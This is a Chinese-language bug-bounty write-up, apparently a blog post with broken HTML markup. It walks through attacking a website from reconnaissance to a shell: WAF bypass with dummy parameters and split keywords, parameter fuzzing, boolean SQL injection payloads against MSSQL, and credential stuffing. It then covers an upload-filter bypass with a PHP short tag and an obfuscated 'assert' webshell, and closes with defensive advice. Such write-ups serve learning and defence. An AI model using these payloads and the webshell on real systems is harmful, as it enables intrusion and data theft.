SRC漏洞挖掘实战：从信息搜集到Getshell的完整过程<\/h1>

1. 信息搜集与目标选择<\/h2>

目标选择策略<\/strong>：主站 vs 子域名

子域名通常防护较弱，但奖金相同<\/li>
作者选择直接测试主站A.com<\/li> <\/ul> <\/li>
工具使用<\/strong>：

Layer子域名扫描工具<\/li>
主站测试优先于子域名扫描<\/li> <\/ul> <\/li> <\/ul>
2. 初步测试：搜索框漏洞探测<\/h2>
2.1 SQL注入测试<\/h3>

输入1'<\/code>测试单引号过滤返回1<\/code>而非1'<\/code> → 可能全局过滤单引号<\/li> <\/ul> <\/li> 测试思路：寻找int类型注入点<\/li> 利用全局过滤特性绕过WAF（如se'l'e'c't<\/code> → select<\/code>）<\/li> <\/ol> <\/li> <\/ul> 2.2 XSS测试<\/h3> 发现搜索框过滤XSS<\/li> 确认非全局单引号过滤<\/li> <\/ul> 3. WAF识别与绕过<\/h2> 3.1 WAF类型识别<\/h3> 测试方法：输入?x=1 union select<\/code> 被拦截 → 硬WAF（流量拦截）<\/li> <\/ul> <\/li> 发现WAF特性：不处理注释内容<\/li> 智能型WAF<\/li> <\/ul> <\/li> <\/ul> 3.2 WAF绕过技术<\/h3> 使用虚假参数构造请求： a=\/&id=真实参数&b=\/ <\/code><\/pre> 程序只接收id参数<\/li> WAF被成功绕过<\/li> <\/ul> <\/li> <\/ul> 4. 目录扫描与敏感路径发现<\/h2> 4.1 扫描策略<\/h3> 使用Burp Suite扫描（避免被封IP）<\/li> 关注状态码：302、403、200<\/li> 发现异常目录\/tz<\/code><\/li> <\/ul> 4.2 方法名Fuzz<\/h3> URL结构分析：路径后跟方法名<\/li> 使用字典：https:\/\/github.com\/TheKingOfDuck\/fuzzDicts<\/li> 发现add<\/code>方法<\/li> <\/ul> 5. 参数Fuzz与SQL注入发现<\/h2> 5.1 参数构造过程<\/h3> username=1<\/code> → 提示"真实姓名不能为空"<\/li> 尝试realname=1<\/code> → 仍提示相同<\/li> 测试"真实姓名"英文翻译 → realname<\/code><\/li> 身份证参数猜测：尝试idcard<\/code> → 失败<\/li> 尝试拼音sfz=1<\/code> → 失败<\/li> 改为sfzh=1<\/code> → 成功<\/li> <\/ul> <\/li> <\/ol> 5.2 SQL注入确认<\/h3> 返回"用户名1已存在" → 数据库交互<\/li> 测试单引号username=1'<\/code> → 报错<\/li> 构造Payload： a=\/&username=1' and 1='1&realname=1&sfzh=111'&b=\/ <\/code><\/pre> 1=1<\/code> → 正常返回<\/li> 1=2<\/code> → 异常返回 → 确认SQL注入<\/li> <\/ul> <\/li> <\/ul> 5.3 数据库类型识别<\/h3> 初始误判为HQL注入<\/li> 通过and user='1'<\/code>测试 → 发现dbo<\/code>用户 → MSSQL数据库<\/li> 确认MSSQL报错注入可行<\/li> <\/ul> 6. 后台渗透与文件上传漏洞<\/h2> 6.1 后台登录<\/h3> 通过SQL注入获取账号密码<\/li> 跨平台撞库成功<\/li> <\/ul> 6.2 文件上传绕过<\/h3> 后缀名绕过<\/strong>：<\/p> 上传jpg文件 → 抓包改后缀<\/li> 换行绕过WAF检测<\/li> <\/ul> <\/li> 内容检测绕过<\/strong>：<\/p> 直接<?php<\/code>被拦截<\/li> 使用短标签<?=phpinfo()?><\/code>成功<\/li> 确认PHP版本5.6<\/li> <\/ul> <\/li> 代码执行构造<\/strong>：<\/p> 关键字过滤绕过： $a=<\/span>'a'<\/span>.<\/span>'s'<\/span>.<\/span>'sert'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 传参方式被拦截 → 使用foreach<\/code>伪全局： foreach<\/span> ($_GET as<\/span> $key=><\/span>$value){ <\/span><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> \[key=$value; } $a($key); \/\/ 相当于assert($_GET['key']) ``` - 最终获取Webshell ## 7. 关键技巧总结 1. **WAF绕过**： - 利用注释和虚假参数 - 智能WAF的特性利用 2. **参数Fuzz**： - 中英文参数名尝试 - 拼音参数名猜测 3. **数据库识别**： - 通过系统用户判断数据库类型 - 报错信息分析 4. **文件上传绕过**： - 短标签利用 - 字符串拼接绕过关键字检测 - `foreach`伪全局变量技巧 5. **整体思路**： - 从表面功能点深入 - 每个异常响应都可能是突破口 - 保持耐心，逐步测试每个可能性 ## 8. 工具与资源 1. 子域名扫描：Layer 2. 目录扫描：Burp Suite 3. Fuzz字典：https:\/\/github.com\/TheKingOfDuck\/fuzzDicts 4. HQL注入测试：hqlmap（虽然本次未成功使用） ## 9. 防御建议 1. 对用户输入严格过滤 2. 避免使用拼音作为参数名 3. 文件上传应检测内容和后缀 4. 关键操作增加二次验证 5. 错误信息统一化，避免泄露系统细节通过这个案例，展示了从信息搜集到最终获取系统权限的完整渗透测试过程，每个步骤都包含了详细的技术细节和思考过程，是学习SRC漏洞挖掘的优秀范例。\]<\/span><\/p>